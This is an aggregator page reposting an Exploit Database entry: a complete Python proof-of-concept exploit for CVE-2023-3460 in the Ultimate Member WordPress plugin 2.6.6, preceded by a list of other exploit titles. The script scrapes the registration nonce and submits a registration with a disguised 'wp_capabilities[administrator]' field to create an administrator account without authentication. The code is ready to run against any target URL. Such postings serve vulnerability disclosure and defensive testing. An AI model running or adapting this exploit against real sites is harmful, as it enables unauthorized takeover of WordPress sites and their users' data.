惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

The Register - Security
The Register - Security
云风的 BLOG
云风的 BLOG
U
Unit 42
F
Fortinet All Blogs
The GitHub Blog
The GitHub Blog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
D
Docker
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
S
Secure Thoughts
Hacker News: Ask HN
Hacker News: Ask HN
Vercel News
Vercel News
S
Security @ Cisco Blogs
GbyAI
GbyAI
Stack Overflow Blog
Stack Overflow Blog
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
I
Intezer
MongoDB | Blog
MongoDB | Blog
AI
AI
MyScale Blog
MyScale Blog
Engineering at Meta
Engineering at Meta
Y
Y Combinator Blog
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
P
Proofpoint News Feed
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
W
WeLiveSecurity
博客园 - 叶小钗
S
SegmentFault 最新的问题
N
News | PayPal Newsroom
WordPress大学
WordPress大学
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
D
DataBreaches.Net
小众软件
小众软件
Microsoft Azure Blog
Microsoft Azure Blog
Spread Privacy
Spread Privacy
H
Help Net Security
美团技术团队
博客园 - 司徒正美
T
Threat Research - Cisco Blogs
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
K
Kaspersky official blog
Application and Cybersecurity Blog
Application and Cybersecurity Blog
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
V
Vulnerabilities – Threatpost
TaoSecurity Blog
TaoSecurity Blog
N
Netflix TechBlog - Medium
L
Lohrmann on Cybersecurity
J
Java Code Geeks
量子位
Martin Fowler
Martin Fowler
博客园_首页

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation
2025-08-28 · via The Exploit Database - CXSecurity.com

Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation

#!/usr/bin/env python3 # Exploit Title: Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation # Exploit Author: Gurjot Singh # CVE: CVE-2023-3460 # Description : The attached PoC demonstrates how an unauthenticated attacker can escalate privileges to admin by abusing unsanitized input in `wp_capabilities` during registration. import requests import argparse import re import urllib3 from bs4 import BeautifulSoup import sys urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def check_password_strength(password): """Checks if password meets complexity requirements.""" if len(password) < 8: print("[!] Password too short! Must be at least 8 characters.") print(" Example: Admin@123") sys.exit(1) # At least one uppercase, one lowercase, one digit, and one special char if not re.search(r'[A-Z]', password): print("[!] Password must contain at least one uppercase letter.") print(" Example: Admin@123") sys.exit(1) if not re.search(r'[a-z]', password): print("[!] Password must contain at least one lowercase letter.") print(" Example: Admin@123") sys.exit(1) if not re.search(r'\d', password): print("[!] Password must contain at least one number.") print(" Example: Admin@123") sys.exit(1) if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password): print("[!] Password must contain at least one special character (!@#$%^&* etc.)") print(" Example: Admin@123") sys.exit(1) def fetch_form_details(session, target_url): print("[*] Fetching form details from register page...") try: res = session.get(target_url, verify=False) soup = BeautifulSoup(res.text, "html.parser") nonce_input = soup.find("input", {"name": "_wpnonce"}) nonce = nonce_input["value"] if nonce_input else None if nonce: print(f"[+] Found _wpnonce: {nonce}") else: print("[-] Could not find _wpnonce") field_names = {} for inp in soup.find_all("input"): if inp.get("name"): field_names[inp.get("name")] = "" return nonce, field_names except Exception as e: print(f"[!] Error fetching form details: {e}") return None, {} def exploit_register(target_url, username, password): session = requests.Session() target_url = target_url.rstrip('/') nonce, fields = fetch_form_details(session, target_url) if not nonce: return form_id = None for name in fields: m = re.search(r"user_login-(\d+)", name) if m: form_id = m.group(1) break if not form_id: form_id = "7" print(f"[+] Using form ID: {form_id}") data = { f"user_login-{form_id}": username, f"first_name-{form_id}": "Admin", f"last_name-{form_id}": username, f"user_email-{form_id}": f"{username}@example.com", f"user_password-{form_id}": password, f"confirm_user_password-{form_id}": password, "form_id": form_id, "um_request": "", "_wpnonce": nonce, "_wp_http_referer": "/register/", "wp_càpabilities[administrator]": "1" } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Referer": target_url, "Origin": target_url.split("/register")[0], } cookies = { "wordpress_test_cookie": "WP Cookie check", "wp_lang": "en_US" } print(f"[*] Sending malicious registration for {username} ...") try: response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False) if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text): print(f"[+] Admin account '{username}' created successfully!") print(f"[+] Login with: Username: {username} | Password: {password}") else: print(f"[-] Could not confirm success. Check target manually.") except Exception as e: print(f"[!] Error during exploit: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)") parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)") parser.add_argument("-u", "--user", default="rakesh", help="Username to create") parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user") args = parser.parse_args() # Check password strength before running check_password_strength(args.password) exploit_register(args.target, args.user, args.password)



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}